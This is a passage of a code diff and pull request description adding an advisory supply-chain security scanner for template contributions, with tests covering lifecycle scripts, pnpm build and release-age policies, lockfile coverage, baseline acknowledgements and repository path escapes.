+  assert.ok(ruleIds.includes('source-dynamic-evaluation'))
+  assert.ok(ruleIds.includes('source-encoded-payload'))
+  const blockedDependency = result.findings.find((finding) => finding.ruleId === 'dependency-build-script-blocked')
+  assert.equal(
+    blockedDependency?.location,
+    'node_modules/.pnpm/native-addon@1.0.0/node_modules/native-addon/package.json',
+  )
+  assert.equal(
+    result.findings.some(
+      (finding) => finding.ruleId === 'source-network-access' && finding.evidence.includes('Unable'),
+    ),
+    false,
+  )
+  const lifecycleSeverities = result.findings
+    .filter((finding) => finding.ruleId === 'manifest-lifecycle-script')
+    .map((finding) => finding.severity)
+  assert.ok(lifecycleSeverities.includes('high'))
+  assert.ok(lifecycleSeverities.includes('medium'))
+  assert.deepEqual(result.findings, [...result.findings].sort(compareExpectedFindings))
+})
+
+test('reports allowed dependency build scripts as review items', () => {
+  const rootDir = createFixtureRepository(['native-addon'])
+  writeJson(join(rootDir, 'community', 'safe-template', 'package.json'), { name: 'safe-template' })
+  writeJson(
+    join(rootDir, 'node_modules', '.pnpm', 'native-addon@1.0.0', 'node_modules', 'native-addon', 'package.json'),
+    { name: 'native-addon', scripts: { install: 'node-gyp rebuild' }, version: '1.0.0' },
+  )
+
+  const result = scanRepository(rootDir)
+  const finding = result.findings.find((item) => item.ruleId === 'dependency-build-script-allowed')
+
+  assert.equal(finding?.severity, 'medium')
+  assert.match(finding?.message ?? '', /explicitly allowed/)
+})
+
+test('renders stable machine-readable and reviewer-facing summaries', () => {
+  const rootDir = createFixtureRepository()
+  writeJson(join(rootDir, 'community', 'template', 'package.json'), {
+    name: 'template\n\u001b[31m',
+    scripts: { postinstall: 'node setup.js' },
+  })
+
+  const report = createSecurityReport(scanRepository(rootDir), EMPTY_SECURITY_BASELINE, '2026-08-09T00:00:00.000Z')
+  const markdown = renderSecurityReport(report)
+
+  assert.equal(report.schemaVersion, 1)
+  assert.equal(report.summary.total, 1)
+  assert.equal(report.summary.high, 1)
+  assert.equal(report.summary.new, 1)
+  assert.equal(report.summary.acknowledged, 0)
+  assert.match(markdown, /Advisory only/)
+  assert.match(markdown, /manifest-lifecycle-script/)
+  assert.match(markdown, /Recommendation:/)
+  assert.equal(markdown.includes('\u001b'), false)
+  assert.equal(markdown.includes('template\n'), false)
+})
+
+test('separates exact acknowledgements from new and stale findings', () => {
+  const finding: SecurityFinding = {
+    category: 'lifecycle-script',
+    evidence: 'postinstall: node setup.js',
+    location: 'community/template/package.json',
+    message: 'Template declares a postinstall lifecycle script.',
+    recommendation: 'Review the invoked code.',
+    ruleId: 'manifest-lifecycle-script',
+    severity: 'high',
+    subject: 'template',
+  }
+  const baseline = parseSecurityBaseline({
+    acknowledgements: [
+      {
+        fingerprint: findingFingerprint(finding),
+        location: finding.location,
+        rationale: 'Reviewed local setup script.',
+        ruleId: finding.ruleId,
+        subject: finding.subject,
+      },
+    ],
+    schemaVersion: 1,
+  })
+
+  const acknowledged = triageFindings([finding], baseline)
+  assert.equal(acknowledged.findings[0].disposition, 'acknowledged')
+  assert.equal(acknowledged.staleAcknowledgements.length, 0)
+
+  const changed = triageFindings([{ ...finding, evidence: 'postinstall: node changed.js' }], baseline)
+  assert.equal(changed.findings[0].disposition, 'new')
+  assert.equal(changed.staleAcknowledgements.length, 1)
+
+  const longCommand = `${'a'.repeat(160)}first-suffix`
+  const longFinding = {
+    ...finding,
+    evidence: `${'a'.repeat(157)}...`,
+    fingerprintEvidence: longCommand,
+  }
+  const longBaseline = parseSecurityBaseline({
+    acknowledgements: [
+      {
+        fingerprint: findingFingerprint(longFinding),
+        location: longFinding.location,
+        rationale: 'Reviewed the complete command.',
+        ruleId: longFinding.ruleId,
+        subject: longFinding.subject,
+      },
+    ],
+    schemaVersion: 1,
+  })
+  const changedSuffix = triageFindings(
+    [{ ...longFinding, fingerprintEvidence: `${'a'.repeat(160)}second-suffix` }],
+    longBaseline,
+  )
+  assert.equal(changedSuffix.findings[0].disposition, 'new')
+  assert.equal(changedSuffix.staleAcknowledgements.length, 1)
+  assert.equal('fingerprintEvidence' in changedSuffix.findings[0], false)
+})
+
+test('rejects duplicate or incomplete baseline acknowledgements', () => {
+  const finding: SecurityFinding = {
+    category: 'dependency-build',
+    evidence: 'install: node-gyp rebuild',
+    location: 'node_modules/.pnpm/native/package.json',
+    message: 'Dependency has an install-time script.',
+    recommendation: 'Review the script.',
+    ruleId: 'dependency-build-script-blocked',
+    severity: 'low',
+    subject: 'native@1.0.0',
+  }
+  const acknowledgement = {
+    fingerprint: findingFingerprint(finding),
+    location: finding.location,
+    rationale: 'Blocked by pnpm.',
+    ruleId: finding.ruleId,
+    subject: finding.subject,
+  }
+
+  assert.throws(
+    () => parseSecurityBaseline({ acknowledgements: [acknowledgement, acknowledgement], schemaVersion: 1 }),
+    /duplicate acknowledgement/,
+  )
+  assert.throws(
+    () => parseSecurityBaseline({ acknowledgements: [{ ...acknowledgement, rationale: '' }], schemaVersion: 1 }),
+    /non-empty rationale/,
+  )
+  assert.throws(
+    () =>
+      triageFindings(
+        [finding],
+        parseSecurityBaseline({
+          acknowledgements: [{ ...acknowledgement, subject: 'different@1.0.0' }],
+          schemaVersion: 1,
+        }),
+      ),
+    /metadata does not match/,
+  )
+})
+
+test('ignores suspicious words in comments and log messages', () => {
+  const rootDir = createFixtureRepository()
+  writeJson(join(rootDir, 'community', 'template', 'package.json'), { name: 'template' })
+  writeText(
+    join(rootDir, 'community', 'template', 'scripts', 'messages.ts'),
+    "console.log('Unable to fetch (via RPC)')\n// exec('not code')\n/* eval('also not code') */\n",
+  )
+
+  assert.deepEqual(scanRepository(rootDir).findings, [])
+})
+
+test('reports templates whose transitive dependencies are absent from the workspace lockfile', () => {
+  const rootDir = createFixtureRepository()
+  writeText(join(rootDir, 'pnpm-lock.yaml'), "lockfileVersion: '9.0'\nimporters:\n  .: {}\n")
+  writeJson(join(rootDir, 'community', 'unlocked-template', 'package.json'), {
+    dependencies: { react: '^19.0.0' },
+    name: 'unlocked-template',
+  })
+
+  const finding = scanRepository(rootDir).findings.find((item) => item.ruleId === 'template-lockfile-coverage-missing')
+  assert.equal(finding?.severity, 'low')
+  assert.match(finding?.evidence ?? '', /1 direct dependencies/)
+})
+
+test('reports missing lockfile and installed dependency coverage', () => {
+  const rootDir = createFixtureRepository()
+  rmSync(join(rootDir, 'pnpm-lock.yaml'))
+  rmSync(join(rootDir, 'node_modules'), { recursive: true })
+  writeJson(join(rootDir, 'community', 'template', 'package.json'), {
+    dependencies: { react: '^19.0.0' },
+    name: 'template',
+  })
+
+  const findings = scanRepository(rootDir).findings
+  assert.equal(findings.find((item) => item.ruleId === 'workspace-lockfile-missing')?.severity, 'high')
+  assert.equal(findings.find((item) => item.ruleId === 'installed-dependency-coverage-missing')?.severity, 'high')
+  assert.ok(findings.some((item) => item.ruleId === 'template-lockfile-coverage-missing'))
+})
+
+test('rejects missing template group configuration', () => {
+  const rootDir = createFixtureRepository()
+  writeJson(join(rootDir, 'package.json'), { repokit: { groups: [] } })
+  assert.throws(() => scanRepository(rootDir), /No template group paths/)
+
+  writeJson(join(rootDir, 'package.json'), { repokit: { groups: [{ path: 'missing' }] } })
+  assert.throws(() => scanRepository(rootDir), /does not exist/)
+
+  mkdirSync(join(rootDir, 'community'))
+  writeJson(join(rootDir, 'package.json'), { repokit: { groups: [{ path: 'community' }] } })
+  assert.throws(() => scanRepository(rootDir), /No template manifests/)
+})
+
+test('flags a pnpm policy that allows every dependency build script', () => {
+  const rootDir = createFixtureRepository()
+  writeText(
+    join(rootDir, 'pnpm-workspace.yaml'),
+    'dangerouslyAllowAllBuilds: true\nminimumReleaseAge: 1440\nonlyBuiltDependencies:\n  - esbuild\npackages:\n  - community/*\n',
+  )
+  writeJson(join(rootDir, 'community', 'template', 'package.json'), { name: 'template' })
+  writeJson(
+    join(rootDir, 'node_modules', '.pnpm', 'native-addon@1.0.0', 'node_modules', 'native-addon', 'package.json'),
+    { name: 'native-addon', scripts: { install: 'node-gyp rebuild' }, version: '1.0.0' },
+  )
+
+  const findings = scanRepository(rootDir).findings
+  const finding = findings.find((item) => item.ruleId === 'pnpm-all-builds-allowed')
+  assert.equal(finding?.severity, 'high')
+  assert.ok(findings.some((item) => item.ruleId === 'dependency-build-script-allowed'))
+  assert.equal(
+    findings.some((item) => item.ruleId === 'dependency-build-script-blocked'),
+    false,
+  )
+})
+
+test('flags a disabled minimum package release age', () => {
+  const rootDir = createFixtureRepository()
+  writeText(
+    join(rootDir, 'pnpm-workspace.yaml'),
+    'minimumReleaseAge: 0\nonlyBuiltDependencies:\n  - esbuild\npackages:\n  - community/*\n',
+  )
+  writeJson(join(rootDir, 'community', 'template', 'package.json'), { name: 'template' })
+
+  const finding = scanRepository(rootDir).findings.find((item) => item.ruleId === 'pnpm-minimum-release-age-disabled')
+  assert.equal(finding?.severity, 'medium')
+})
+
+test('flags a weakened or globally excluded minimum package release age', () => {
+  const rootDir = createFixtureRepository()
+  writeText(
+    join(rootDir, 'pnpm-workspace.yaml'),
+    'minimumReleaseAge: 60\nminimumReleaseAgeExclude:\n  - "*"\nonlyBuiltDependencies:\n  - esbuild\npackages:\n  - community/*\n',
+  )
+  writeJson(join(rootDir, 'community', 'template', 'package.json'), { name: 'template' })
+
+  const findings = scanRepository(rootDir).findings
+  assert.equal(findings.find((item) => item.ruleId === 'pnpm-minimum-release-age-too-low')?.severity, 'medium')
+  assert.equal(findings.find((item) => item.ruleId === 'pnpm-minimum-release-age-globally-excluded')?.severity, 'high')
+})
+
+test('rejects template group paths outside the repository', () => {
+  const rootDir = createFixtureRepository()
+  writeJson(join(rootDir, 'package.json'), {
+    repokit: { groups: [{ path: '../outside' }] },
+  })
+
+  assert.throws(() => scanRepository(rootDir), /escapes the repository/)
+})
+
+test('rejects template group links outside the repository', () => {
+  const rootDir = createFixtureRepository()
+  const outsideDir = mkdtempSync(join(tmpdir(), 'template-security-outside-'))
+  temporaryDirectories.push(outsideDir)
+  symlinkSync(outsideDir, join(rootDir, 'linked-group'), process.platform === 'win32' ? 'junction' : 'dir')
+  writeJson(join(rootDir, 'package.json'), {
+    repokit: { groups: [{ path: 'linked-group' }] },
+  })
+
+  assert.throws(() => scanRepository(rootDir), /escapes the repository/)
+})
+
+function createFixtureRepository(onlyBuiltDependencies: readonly string[] = ['esbuild']): string {
+  const rootDir = mkdtempSync(join(tmpdir(), 'template-security-'))
+  temporaryDirectories.push(rootDir)
+  writeJson(join(rootDir, 'package.json'), {
+    repokit: { groups: [{ path: 'community' }] },
+  })
+  writeText(
+    join(rootDir, 'pnpm-workspace.yaml'),
+    `minimumReleaseAge: 1440\nonlyBuiltDependencies:\n${onlyBuiltDependencies.map((name) => `  - ${name}\n`).join('')}packages:\n  - community/*\n`,
+  )
+  writeText(
+    join(rootDir, 'pnpm-lock.yaml'),
+    "lockfileVersion: '9.0'\nimporters:\n  .: {}\n  community/risky-template: {}\n  community/safe-template: {}\n  community/template: {}\n",
+  )
+  mkdirSync(join(rootDir, 'node_modules', '.pnpm'), { recursive: true })
+  return rootDir
+}
+
+function writeJson(path: string, value: unknown): void {
+  writeText(path, `${JSON.stringify(value, null, 2)}\n`)
+}
+
+function writeText(path: string, value: string): void {
+  mkdirSync(dirname(path), { recursive: true })
+  writeFileSync(path, value)
+}
+
+function compareExpectedFindings(
+  left: ReturnType<typeof scanRepository>['findings'][number],
+  right: ReturnType<typeof scanRepository>['findings'][number],
+): number {
+  const severityOrder = { high: 0, medium: 1, low: 2 }
+  return (
+    severityOrder[left.severity] - severityOrder[right.severity] ||
+    left.location.localeCompare(right.location) ||
+    left.ruleId.localeCompare(right.ruleId) ||
+    left.subject.localeCompare(right.subject)
+  )
+}

--- a/scripts/security/types.ts
+++ b/scripts/security/types.ts
@@ -1,0 +1,71 @@
+export type FindingSeverity = 'high' | 'medium' | 'low'
+
+export type FindingCategory =
+  | 'dependency-build'
+  | 'dependency-source'
+  | 'dependency-version'
+  | 'lifecycle-script'
+  | 'pnpm-policy'
+  | 'scan-coverage'
+  | 'source-pattern'
+
+export type SecurityFinding = {
+  readonly category: FindingCategory
+  readonly evidence: string
+  readonly fingerprintEvidence?: string
+  readonly location: string
+  readonly message: string
+  readonly recommendation: string
+  readonly ruleId: string
+  readonly severity: FindingSeverity
+  readonly subject: string
+}
+
+export type BaselineAcknowledgement = {
+  readonly fingerprint: string
+  readonly location: string
+  readonly rationale: string
+  readonly ruleId: string
+  readonly subject: string
+}
+
+export type SecurityBaseline = {
+  readonly acknowledgements: readonly BaselineAcknowledgement[]
+  readonly schemaVersion: 1
+}
+
+export type TriagedFinding = Omit<SecurityFinding, 'fingerprintEvidence'> & {
+  readonly disposition: 'acknowledged' | 'new'
+  readonly rationale?: string
+}
+
+export type SecuritySummary = {
+  readonly acknowledged: number
+  readonly high: number
+  readonly low: number
+  readonly medium: number
+  readonly new: number
+  readonly staleAcknowledgements: number
+  readonly total: number
+}
+
+export type SecurityReport = {
+  readonly findings: readonly TriagedFinding[]
+  readonly generatedAt: string
+  readonly scannedDependencyPackages: number
+  readonly scannedTemplates: number
+  readonly schemaVersion: 1
+  readonly staleAcknowledgements: readonly BaselineAcknowledgement[]
+  readonly summary: SecuritySummary
+}
+
+export type ScanResult = {
+  readonly findings: readonly SecurityFinding[]
+  readonly scannedDependencyPackages: number
+  readonly scannedTemplates: number
+}
+
+export type TriageResult = {
+  readonly findings: readonly TriagedFinding[]
+  readonly staleAcknowledgements: readonly BaselineAcknowledgement[]
+}


### PR DESCRIPTION
## Summary

Adds an advisory security harness for template contributions, addressing #453.

The harness performs a deterministic review of template manifests, setup code, dependency metadata, and pnpm security policy. Findings are reported for human review without automatically blocking legitimate template behavior.

## What It Reviews

- Install and publish lifecycle scripts
- Dependency install scripts and pnpm build permissions
- Git, HTTP, SSH, local, and workspace dependency sources
- Loose or mutable dependency versions
- Shell commands, inline execution, and download commands
- Dynamic evaluation and encoded payloads
- Child-process execution and network access in setup/configuration code
- Templates without complete workspace lockfile coverage
- Reviewable source files exceeding the 256,000-byte scan limit, reported with their path and byte size
- pnpm minimum release-age and build-script policies

## Triage Model

The checked-in baseline records findings that have already been reviewed, including an explanation for each acknowledgement.

Fingerprints include the complete underlying evidence, even when the displayed evidence is shortened. Any change to a reviewed command, dependency script, source location, severity, or behavior becomes a new finding and leaves the previous acknowledgement stale.

Pull requests are compared against the baseline from the exact target-branch commit. A contributor therefore cannot acknowledge new behavior within the same pull request.

## Workflow Safety

The workflow:

- Runs on every pull request so future template roots are not missed
- Installs dependencies with lifecycle scripts and pnpm hooks disabled
- Rejects configured paths or directory links that escape the repository
- Uses read-only GitHub permissions
- Publishes JSON and Markdown reports for reviewers
- Remains advisory when findings require human review

## Existing Catalog Review

The refreshed scan against current main reviewed:

- 43 templates
- 2,804 installed dependency packages
- 35 existing findings
  - 1 high
  - 16 medium
  - 18 low

The findings consist of expected scaffolding/build commands, explicitly permitted native dependency scripts, dependency scripts already blocked by pnpm, expected x402 network requests, the Supabase live test launching its local indexer without a shell, and six documented mobile lockfile-coverage gaps.

No unexpected or confirmed malicious install behavior was identified.

Because `main` does not contain a security baseline yet, this initial pull request will report all 35 findings as new for one-time review. After the baseline lands, the same catalog produces 0 new, 35 acknowledged, and 0 stale findings.

## Validation

- 15 security harness tests pass
- Strict TypeScript validation passes
- Workflow validation passes
- Repository metadata and template structure validation pass
- Reports are deterministic
- Reviewed catalog result: 0 new, 35 acknowledged, 0 stale

## Deliberate Limits

The harness does not query mutable package-registry data for typosquatting or individual publication-age scoring. It verifies the repository's minimum release-age policy and leaves registry-backed analysis as a potential follow-up.

Closes #453
